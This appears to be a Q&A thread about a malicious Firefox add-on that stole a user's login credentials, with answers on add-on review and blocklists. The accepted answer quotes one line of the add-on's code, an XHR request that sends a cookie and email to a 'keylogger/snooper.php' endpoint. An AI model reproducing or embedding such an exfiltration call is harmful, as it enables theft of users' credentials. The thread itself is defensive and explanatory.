# How securely use Firefox Add-on to prevent steal data?

Tags: web-browser, malware, firefox, spyware, browser-extensions

Some videos on YouTube demonstrate how a Firefox extension can collect login information used to login to websites such as Facebook.

After installing this tool/malware as Firefox Add-on, I observed the activity of my browser using Firebug. My username and password was sent to a server via Ajax request.

I contacted the author. He said that he can embed this script to any Firefox Add-on.

How can I securely use Firefox Add-ons? I installed 3 types of Antivirus and Firewall. But none of that was able to detect this malware.

Comment: For testing i made a new gmail account. test the second tool.
after 10 or 12 hour i got the entered password in my original account . I have https connection,antivirus, firewall.why this happened?

Comment: Related [What are the security implications of people downloading plugins, wrongly thinking that they are safe?](http://security.stackexchange.com/q/5875/665)

Comment: @dippu - This sort of malicious file is easy to avoid.  Understand how Firefox Add-ons work and only use add-ons that have been verified and are not written by malicious users.

Answer (score 4, accepted):

### How do you protect yourself

Firefox addons from the official site are put through the addon review proces https://addons.mozilla.org/en-US/developers/docs/policies/reviews

So you can check if an addon is official and has been reviewed before installing.

It's not 100% You can find a list of blocked addons removed by Mozilla due to given reasons (viruses, trojans, etc.) https://addons.mozilla.org/en-US/firefox/blocked/

Installing an addon from a 3rd party is more dangerous, so you may need to personally check the source code (which is possible since it's a zip of javascript files) or trust the author/provider.

### How does the maleware work?

The .xul file contains the following line of code:

```
xhr.open("GET", 
      "http://www.removedurl.com/keylogger/snooper.php?
       facebook="+cookie+'&email='+email, true);
```

So when you test this script on your own account it will be sending him the your password. For this reason you should delete this addon and change your password.